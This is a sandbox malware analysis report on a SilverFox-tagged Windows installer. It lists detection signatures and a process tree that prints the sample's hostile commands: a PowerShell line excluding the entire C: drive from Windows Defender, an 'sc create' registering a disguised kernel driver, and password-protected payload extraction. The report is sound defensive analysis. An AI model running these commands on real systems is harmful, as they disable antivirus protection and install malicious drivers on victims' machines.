Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_1.0.9.exe

Overview

General Information

Sample name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
renamed because original name is a hash value
Original sample name:_1.0.9.exe
Analysis ID:1579605
MD5:ff430c30f7b9f0550f6b68dcc709c55b
SHA1:a47d3d79a05d232d45aadd14045765521cfd8431
SHA256:6a11d0ca2303bffe42e568f32c1adefd70742379ce2639f2ee2a437051ac9c13
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: FF430C30F7B9F0550F6B68DCC709C55B)
    • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7320 cmdline: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" MD5: 9902FA6D39184B87AED7D94A037912D8)
      • powershell.exe (PID: 7348 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7532 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U52a9#U624b_1.0.9.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: FF430C30F7B9F0550F6B68DCC709C55B)
        • #U5b89#U88c5#U52a9#U624b_1.0.9.tmp (PID: 7656 cmdline: "C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$40272,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" /VERYSILENT MD5: 9902FA6D39184B87AED7D94A037912D8)
          • 7zr.exe (PID: 7728 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 7828 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7808 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • sc.exe (PID: 7728 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7692 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7712 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7920 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7952 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8040 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8056 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8124 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8140 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5772 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1216 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5800 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1748 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3492 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4564 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7360 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3584 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3668 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7308 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1188 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7756 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7392 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7456 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7520 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7356 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7884 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7848 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7936 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 824 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 8084 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5744 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5804 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 8160 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2872 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2640 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1832 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3448 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2912 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7200 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3272 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5436 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7120 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4312 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2472 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7308 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7724 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7716 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7760 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 7400 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7460 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7712, ProcessName: sc.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 7712, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp" /SL5="$20456,4753292,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ParentProcessId: 7320, ParentProcessName: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 7348, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.5% probability
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1831583959.0000000003740000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1831723417.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C15AEC0 FindFirstFileA,FindClose,FindClose,6_2_6C15AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_009F6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_009F7496
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
